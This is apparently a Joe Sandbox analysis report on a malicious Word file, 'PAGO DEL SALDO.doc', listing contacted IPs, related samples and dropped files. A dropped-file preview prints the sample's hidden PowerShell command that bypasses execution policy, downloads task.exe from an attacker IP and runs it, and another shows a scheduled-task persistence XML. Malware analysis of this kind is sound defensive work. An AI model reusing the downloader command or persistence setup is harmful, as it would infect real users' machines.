http://173.232.204.89	powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.438810509.0000000003839000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
httP://173.232.204.89/task.exePE	powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.piriform.com/ccleaner	powershell.exe, 00000005.00000002.424310853.00000000003AF000.00000004.00000020.sdmp	false		high
http://www.%s.comPA	powershell.exe, 00000003.00000002.432791776.0000000002300000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.424597897.0000000002340000.00000002.00020000.sdmp, task.exe, 00000009.00000002.449659723.0000000004E40000.00000002.00020000.sdmp	false	URL Reputation: safe	low
httP://173.232	powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	task.exe, 00000009.00000002.448392775.000000000239B000.00000004.00000001.sdmp, task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	task.exe, 00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
httP://173.232.204.89/task.ex	powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
httP://173.232.204.89/task.exe	powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.425635089.0000000002D8F000.00000004.00000001.sdmp	true		unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
208.91.198.143	us2.smtp.mailhostbox.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false
208.91.199.224	unknown	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	true
173.232.204.89	unknown	United States	62904	EONIX-COMMUNICATIONS-ASBLOCK-62904US	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528739
Start date:	25.11.2021
Start time:	18:20:30
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PAGO DEL SALDO.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@21/27@8/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 93% Number of executed functions: 82 Number of non-executed functions: 6
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:21:21	API Interceptor	144x Sleep call for process: powershell.exe modified
18:21:29	API Interceptor	1177x Sleep call for process: task.exe modified
18:21:34	API Interceptor	1x Sleep call for process: schtasks.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
208.91.198.143	MT_1O1_SWIFt.doc	Get hash	malicious	Browse
	Reconfirm The Details.doc	Get hash	malicious	Browse
	Document.exe	Get hash	malicious	Browse
	MT_101_SWIFT.doc	Get hash	malicious	Browse
	Purchase Order PO#7701.exe	Get hash	malicious	Browse
	TNT E-Invoice No 11073490.exe	Get hash	malicious	Browse
	E invoice.exe	Get hash	malicious	Browse
	UY2021 Ta-Ho Maritime Schedule.exe	Get hash	malicious	Browse
	PNkBekAKOeQD1Jj.exe	Get hash	malicious	Browse
	PRESUPUESTO.xlsx	Get hash	malicious	Browse
	DHL Documentos de envio originales.exe	Get hash	malicious	Browse
	XSsBxQH419.exe	Get hash	malicious	Browse
	devis.xlsx	Get hash	malicious	Browse
	Quotation- 306013SQ.exe	Get hash	malicious	Browse
	PO 4601056018.exe	Get hash	malicious	Browse
	Purchase Order Vale-60,000MT.exe	Get hash	malicious	Browse
	BOQ 11745692.exe	Get hash	malicious	Browse
	dhl_doc9548255382.exe	Get hash	malicious	Browse
	ADYP_210913_100641_PAGOS_005539.xlsx	Get hash	malicious	Browse
	Quotation.xlsx	Get hash	malicious	Browse
208.91.199.224	MT_1O1_SWIFt.doc	Get hash	malicious	Browse
	Reconfirm The Details.doc	Get hash	malicious	Browse
	Document.exe	Get hash	malicious	Browse
	MT_101_SWIFT.doc	Get hash	malicious	Browse
	ORDER INQUIRY-PVP-SP-2021-58.exe	Get hash	malicious	Browse
	DOC221121.exe	Get hash	malicious	Browse
	TOP QUOTATION RFQ 2021.exe	Get hash	malicious	Browse
	AWB Number 0004318855.DOCX.exe	Get hash	malicious	Browse
	Purchase Order.exe	Get hash	malicious	Browse
	ORDER INQUIRY-PVP-SP-2021-56.exe	Get hash	malicious	Browse
	PRESUPUESTO.xlsx	Get hash	malicious	Browse
	vYeUxRnIbLKDudo.exe	Get hash	malicious	Browse
	DHL Documentos de envio originales.exe	Get hash	malicious	Browse
	pVLzns64XtYkuFT.exe	Get hash	malicious	Browse
	BOQ 11745692.exe	Get hash	malicious	Browse
	BOQ 11745692.exe	Get hash	malicious	Browse
	ADYP_210913_100641_PAGOS_005539.xlsx	Get hash	malicious	Browse
	gHs6ECUllmPgK2I.exe	Get hash	malicious	Browse
	RFQ.exe	Get hash	malicious	Browse
	IMG-4579876545676545676543.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
us2.smtp.mailhostbox.com	MT_1O1_SWIFt.doc	Get hash	malicious	Browse	208.91.199.224
	Reconfirm The Details.doc	Get hash	malicious	Browse	208.91.199.224
	Document.exe	Get hash	malicious	Browse	208.91.198.143
	MT_101_SWIFT.doc	Get hash	malicious	Browse	208.91.199.225
	ORDER INQUIRY-PVP-SP-2021-58.exe	Get hash	malicious	Browse	208.91.199.224
	DOC221121.exe	Get hash	malicious	Browse	208.91.199.224
	Swift_HSBC_0099087645 xOJ4XUjdMZ40k5Hpdf.exe	Get hash	malicious	Browse	208.91.199.225
	Swift_HSBC_0099087645PDF.exe	Get hash	malicious	Browse	208.91.199.225
	P0_636732672772_RFQ.exe	Get hash	malicious	Browse	208.91.199.225
	rTyPU1zmY5PsyNl.exe	Get hash	malicious	Browse	208.91.199.223
	DOCUMENTS.exe	Get hash	malicious	Browse	208.91.199.223
	Purchase Order PO#7701.exe	Get hash	malicious	Browse	208.91.198.143
	STATEMENT OF ACCOUNT.xlsx	Get hash	malicious	Browse	208.91.199.225
	XsFFv27rls.exe	Get hash	malicious	Browse	208.91.199.225
	TransactionSummary_22-11-2021.exe	Get hash	malicious	Browse	208.91.199.225
	TNT E-Invoice No 11073490.exe	Get hash	malicious	Browse	208.91.198.143
	E invoice.exe	Get hash	malicious	Browse	208.91.198.143
	TOP QUOTATION RFQ 2021.exe	Get hash	malicious	Browse	208.91.199.223
	(KOREA SHIPPING - KLCSM).exe	Get hash	malicious	Browse	208.91.199.224
	Bill of lading.exe	Get hash	malicious	Browse	208.91.199.225

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PUBLIC-DOMAIN-REGISTRYUS	MT_1O1_SWIFt.doc	Get hash	malicious	Browse	208.91.199.224
	Reconfirm The Details.doc	Get hash	malicious	Browse	208.91.199.224
	Document.exe	Get hash	malicious	Browse	208.91.199.224
	Swift Copy TT.doc	Get hash	malicious	Browse	207.174.212.140
	MT_101_SWIFT.doc	Get hash	malicious	Browse	208.91.199.224
	ORDER INQUIRY-PVP-SP-2021-58.exe	Get hash	malicious	Browse	208.91.199.224
	DOC221121.exe	Get hash	malicious	Browse	208.91.199.224
	Swift_HSBC_0099087645PDF.exe	Get hash	malicious	Browse	208.91.199.225
	P0_636732672772_RFQ.exe	Get hash	malicious	Browse	208.91.199.225
	DOCUMENTS.exe	Get hash	malicious	Browse	208.91.199.223
	Activation Online Mail.htm	Get hash	malicious	Browse	103.50.163.110
	Purchase Order PO#7701.exe	Get hash	malicious	Browse	208.91.198.143
	STATEMENT OF ACCOUNT.xlsx	Get hash	malicious	Browse	208.91.199.225
	XsFFv27rls.exe	Get hash	malicious	Browse	208.91.199.225
	TNT E-Invoice No 11073490.exe	Get hash	malicious	Browse	208.91.199.225
	SWIFT COPY.exe	Get hash	malicious	Browse	199.79.62.99
	E invoice.exe	Get hash	malicious	Browse	208.91.199.225
	TOP QUOTATION RFQ 2021.exe	Get hash	malicious	Browse	208.91.199.224
	TOwYernH3DhfPER.exe	Get hash	malicious	Browse	208.91.199.181
	Activation Online Mail.htm	Get hash	malicious	Browse	103.50.163.110
PUBLIC-DOMAIN-REGISTRYUS	MT_1O1_SWIFt.doc	Get hash	malicious	Browse	208.91.199.224
	Reconfirm The Details.doc	Get hash	malicious	Browse	208.91.199.224
	Document.exe	Get hash	malicious	Browse	208.91.199.224
	Swift Copy TT.doc	Get hash	malicious	Browse	207.174.212.140
	MT_101_SWIFT.doc	Get hash	malicious	Browse	208.91.199.224
	ORDER INQUIRY-PVP-SP-2021-58.exe	Get hash	malicious	Browse	208.91.199.224
	DOC221121.exe	Get hash	malicious	Browse	208.91.199.224
	Swift_HSBC_0099087645PDF.exe	Get hash	malicious	Browse	208.91.199.225
	P0_636732672772_RFQ.exe	Get hash	malicious	Browse	208.91.199.225
	DOCUMENTS.exe	Get hash	malicious	Browse	208.91.199.223
	Activation Online Mail.htm	Get hash	malicious	Browse	103.50.163.110
	Purchase Order PO#7701.exe	Get hash	malicious	Browse	208.91.198.143
	STATEMENT OF ACCOUNT.xlsx	Get hash	malicious	Browse	208.91.199.225
	XsFFv27rls.exe	Get hash	malicious	Browse	208.91.199.225
	TNT E-Invoice No 11073490.exe	Get hash	malicious	Browse	208.91.199.225
	SWIFT COPY.exe	Get hash	malicious	Browse	199.79.62.99
	E invoice.exe	Get hash	malicious	Browse	208.91.199.225
	TOP QUOTATION RFQ 2021.exe	Get hash	malicious	Browse	208.91.199.224
	TOwYernH3DhfPER.exe	Get hash	malicious	Browse	208.91.199.181
	Activation Online Mail.htm	Get hash	malicious	Browse	103.50.163.110
EONIX-COMMUNICATIONS-ASBLOCK-62904US	MT_1O1_SWIFt.doc	Get hash	malicious	Browse	173.232.204.89
	Reconfirm The Details.doc	Get hash	malicious	Browse	173.232.204.89
	MT_101_SWIFT.doc	Get hash	malicious	Browse	173.232.204.89
	arm6-20211124-0649	Get hash	malicious	Browse	170.130.75.226
	K7hNSg5hRL.exe	Get hash	malicious	Browse	170.130.13.186
	MT 1O1.doc	Get hash	malicious	Browse	173.232.204.89
	PO 635.doc	Get hash	malicious	Browse	173.232.204.89
	DHL_119040 al#U0131#U015f irsaliyesi belgesi,pdf.exe	Get hash	malicious	Browse	208.89.219.70
	PROFORMA INVOICE.exe	Get hash	malicious	Browse	173.232.62.19
	1687HM2021.xlsx.exe	Get hash	malicious	Browse	173.213.66.89
	BwJriVGrt5.exe	Get hash	malicious	Browse	170.130.10.102
	PURCHASE ORDER.doc	Get hash	malicious	Browse	173.232.204.89
	001100202021.exe	Get hash	malicious	Browse	23.90.37.72
	bnmf4567.exe	Get hash	malicious	Browse	50.3.41.145
	Hack.exe	Get hash	malicious	Browse	104.140.244.186
	setup_x86_x64_install.exe	Get hash	malicious	Browse	107.158.11.57
	ixijzt2mxt.exe	Get hash	malicious	Browse	104.140.201.42
	GTA5TerrorMM.exe	Get hash	malicious	Browse	104.140.244.186
	FANDER_MOD V3.03.exe	Get hash	malicious	Browse	104.140.201.42
	Injector.exe	Get hash	malicious	Browse	104.140.201.42

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Roaming\SzfukVRF.exe	MT_1O1_SWIFt.doc	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exe	MT_1O1_SWIFt.doc	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\task.exe	MT_1O1_SWIFt.doc	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exe Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	504832
Entropy (8bit):	7.875034070984988
Encrypted:	false
SSDEEP:	12288:+v5E70ZixBFm0hDKr62YWLJp7WtXpcCAVS4EzOnsQ7b51:+vG70Zi1hy6O+LAVS4C
MD5:	F65B0793251364C03D06E8E7134FC21B
SHA1:	7BC80E89BBC7C10B974462E748849F9056D20D4A
SHA-256:	A031918E001745C0F07D5D0AC118A0BFEB946236033E20FA1B16E0D54EE7BCB8
SHA-512:	BAC2E15EAFEFF6708D67A224B96FBC62F062A6029D7E5DFCB773C2B07AAC4C01F910724192A6294DA3456B50E016F5A9859E9DD6EA18C2C51F02377AFBA3CB82
Malicious:	true
Joe Sandbox View:	Filename: MT_1O1_SWIFt.doc, Detection: malicious, Browse
Reputation:	low
IE Cache URL:	http://173.232.204.89/task.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j.a..............0.................. ........@.. ....................... ............@.................................\|...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........e...t..........\... .............................................{ .....{!.....{".....{#.....($.....} .....}!.....}"......}#.......0..s........u........f.,`(%....{ ....{ ...o&...,H('....{!....{!...o(...,0()....{"....{"...o...,.(+....{#....{#...o,...+..+....0..b....... .@d )UU.Z(%....{ ...o-...X )UU.Z('....{!...o....X )UU.Z()....{"...o/...X )UU.Z(+....{#...o0...X...0...........r...p......%..{ ......%q.........-.&.+.......o1....%..{!......%q.........-.&.+.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2CAE3F9.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
Category:	dropped
Size (bytes):	3712
Entropy (8bit):	5.037816902563746
Encrypted:	false
SSDEEP:	96:Qk7Hgwj+mbYf3LSrhlOs0f5aSdHn63Dx3:Qk7Awam8fI4s0f5ap3
MD5:	7E855AA0ECA27E6E8E2A2F8AE2A48F33
SHA1:	C309D1A169059EA57D6AA0A4D5FA4B00B83C67C7
SHA-256:	8E612AA9E10E31E5D64AB9FEC4E7FFBED91C8C47620CEED5C5460750EB5E4C3B
SHA-512:	AFEBD07201DDEE57140E6444D62DA8BCC53D0F0F2C62951162E762136979A114DAD92B7652D6A3C9214A20265D04B3FE5BFA70870ED1AFD96BD5F8A837FEF27C
Malicious:	false
Preview:	......@.....!.....................5...........................Segoe UI....C.-.....@..........#....-...........................A..... . ..... . ...:.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...:.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD7EADD8.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	370 sysV pure executable
Category:	dropped
Size (bytes):	262160
Entropy (8bit):	0.24537807839389073
Encrypted:	false
SSDEEP:	96:xcrH7XNEN+N8//zb+H2fffFilJBzkNDDN+N8//zb+H2fffFuExB+3NhDN+N8/mLk:2zrNVE9GJ6NuE9u/cwz1J6NuE9
MD5:	ABBD59B3E4B072E6702F1F910CAA05D6
SHA1:	9D8AD507D0339D217561F0A8E69607D38545D6BB
SHA-256:	4C0541BD1C3B054F9FB790A3E7FC898908B2D9104FF61A09500A9CA1C3291870
SHA-512:	7B17AACAEF606D51E448E37065D1EEF1C261239E7AE4A5F9B2A5FB0289A6C8B101B3A5C37055699FDA4536D45AD321989302E864F864EFB9E9DBE1B33E4B3F39
Malicious:	false
Preview:	X.:.....p.j.....o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.e.". .-.N.o.P. .-.s.t.a. .-.N.o.n.I. .-.W. .H.i.d.d.e.n. .-.E.x.e.c.u.t.i.o.n.P.o.l.i.c.y. .b.y.p.a.s.s. .-.N.o.L.o.g.o. .-.c.o.m.m.a.n.d. .".(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...D.o.w.n.l.o.a.d.F.i.l.e.(.'.h.t.t.P.:././.1.7.3...2.3.2...2.0.4...8.9./.t.a.s.k...e.x.e.'.,.'.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k...e.x.e.'.).;.S.t.a.r.t.-.P.r.o.c.e.s.s. .'.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k...e.x.e.'.".............l.....0.k.......................................X.....................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	214016
Entropy (8bit):	4.757014234408119
Encrypted:	false
SSDEEP:	1536:tBabzacasapa2H/Na7rRlBabzacasapa2H/Na7pmV:mbzacasapa2HY7Abzacasapa2HY7
MD5:	B33010290F6ED0C12253AFD2B83EE458
SHA1:	E492CAD440EFC9C93553D95A158ED84A0656F2AB
SHA-256:	54147F6E9949D14672892FDC5104A02A1E41DB662D39EDC135FC12FB24C91C10
SHA-512:	9C1FB272563766455908B1B41E84B4A386DDE1AF25B867103B3E4D52CA15CA1EA4B7008DB069313431CC35C40F1383BFACB0E10F21F00544822527C47D4E6135
Malicious:	false
Preview:	......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4D8A2392-564C-4DB2-903D-17A8A736109B}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	44098
Entropy (8bit):	2.879594246936239
Encrypted:	false
SSDEEP:	768:dq/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:aFia0Dqeb0nstw29rVzWSgm58F
MD5:	7C0A9B9DA73BA081A06703CECE345DFF
SHA1:	84823768F9E22131B15777CB4196A15FEEF9ADCA
SHA-256:	27748FD8FFDB4A4163016E5DA937315BD05E77357931B45BD1E1EC58C0C20A48
SHA-512:	79969B8A67392228AE3998F1C6AF17F393EFD89CAF90D5D47426498E93EEED996DEB3AE150BCB82225058E8DD2F5F80D6FB9FC98198E0DF0E869AA6B2DA507F7
Malicious:	false
Preview:	c.0.5.=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.a.b.d.t.f.h.g.h.g.e.g.h.D.p.~...S.C.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".L.I.N.K.........................................................................................................................................................................................................................................................H...R...X............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .j.RJe...CJ..OJ..QJ..U..^J..aJ.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{527B5D4D-3E6F-42BD-8FFA-6C52D5EDBEDF}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{88FEB9FD-DBED-46CA-AEE6-1702A6B1006D}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3573187972516119
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbl:IiiiiiiiiifdLloZQc8++lsJe1Mzq
MD5:	B05EDE552A5E4F0375E4000DDD8804EB
SHA1:	AFAA26BF1745F8425FB3B92CDF455B64C1030455
SHA-256:	458E1D3CDD8D4D59A90D24A07CBFAEFEE7A13A0D793E0F173F080F79AE178BE7
SHA-512:	46FE16339641E02940C4F8B1DBF3EE89B6CB2C5B6236AB5BB74B4F5DD3AE9979CB6820AA7A0DDB83952FA31CA5D08EB1FD2C3351C7DACC9F358D210B168BD1B6
Malicious:	false
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	97514
Entropy (8bit):	4.489544623132179
Encrypted:	false
SSDEEP:	768:VBabzacasapa2lGWOlARldNVYwUn7ZwPW1ir:VBabzacasapa2H/Na7M
MD5:	EB599CC95ACB0DA0DAFFE2C49E6CA94C
SHA1:	581089674A9F472221C002E613C5B1830ACC9D1D
SHA-256:	936F1E2D5FB8C9CD1535E4092D28A989929BAFD0EFDF2A555D2AC5CF5612BFF7
SHA-512:	7A378AA05AABFF3FCB305956BA7600875376B33477D654984AE1D9AC49D27BB0AFEDB5BE38C17DDAC754DDEE95CCD57F23336BBE3FD4ABC53477291E71971E27
Malicious:	true
Preview:	.............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT:Zone.Identifier Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:gAWY3n:qY3n
MD5:	FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA1:	D59FC84CDD5217C6CF74785703655F78DA6B582B
SHA-256:	EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
SHA-512:	AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
Malicious:	false
Preview:	[ZoneTransfer]..ZoneId=3..

C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp Download File
Process:	C:\Users\user\AppData\Roaming\task.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1574
Entropy (8bit):	5.11268735911116
Encrypted:	false
SSDEEP:	24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt9xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTDv
MD5:	2FB2F595006AB549A4C00CC852A1F691
SHA1:	9B8CFA7A4D43ADF4C3ADEA923AE5AFDDE3A40314
SHA-256:	5466C2D681BB5F3A6B50D13FD153C920D963FE658574BBD123371BC02FAC0E86
SHA-512:	76720B62C1F421B2D88E38540560033CE47D60D37AA5E22AEC2805A1CD78E3CE0EB716CF9770D00DC128043D6514EA9329B0C88FB9D6FDCF135151658D00BC11
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PAGO DEL SALDO.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Fri Nov 26 01:21:13 2021, length=393199, window=hide
Category:	dropped
Size (bytes):	1034
Entropy (8bit):	4.557967550864718
Encrypted:	false
SSDEEP:	12:8MyTSp1tgXg/XAlCPCHaXjByB/AVtX+W3MTxEUR9LicvbS2wIyR9BDtZ3YilMMEz:8My2/XTTc+bd/e52Dv3qg87l
MD5:	9A01376D1343F9F324D36215EA07B616
SHA1:	6AA3137B198FAE3A9868E48F28B4D4816A5ED0DF
SHA-256:	D2CF4B190147E17EFEDF7545BAE918424531159EFC0E083FF28B15BC0034B6A9
SHA-512:	7FCD858C9DB695DCA4E1D7E5F4AE9CEC2CA0629EBC637E2B154ECFEAB9EB1B9302D333DF5F2C7ACD40FBE2EA26548277FBA414D328EB99F3A24CA43DBEED588C
Malicious:	false
Preview:	L..................F.... ....f>....f>......Hl................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S.....&=....U...............A.l.b.u.s.....z.1......S ...Desktop.d......QK.X.S ...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2.....zS.. .PAGODE~1.DOC..R.......S...S...........................P.A.G.O. .D.E.L. .S.A.L.D.O...d.o.c.......\|...............-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop\PAGO DEL SALDO.doc.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.A.G.O. .D.E.L. .S.A.L.D.O...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......841618..........D_....3N...W...9..g............[D_

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	79
Entropy (8bit):	4.741754287211816
Encrypted:	false
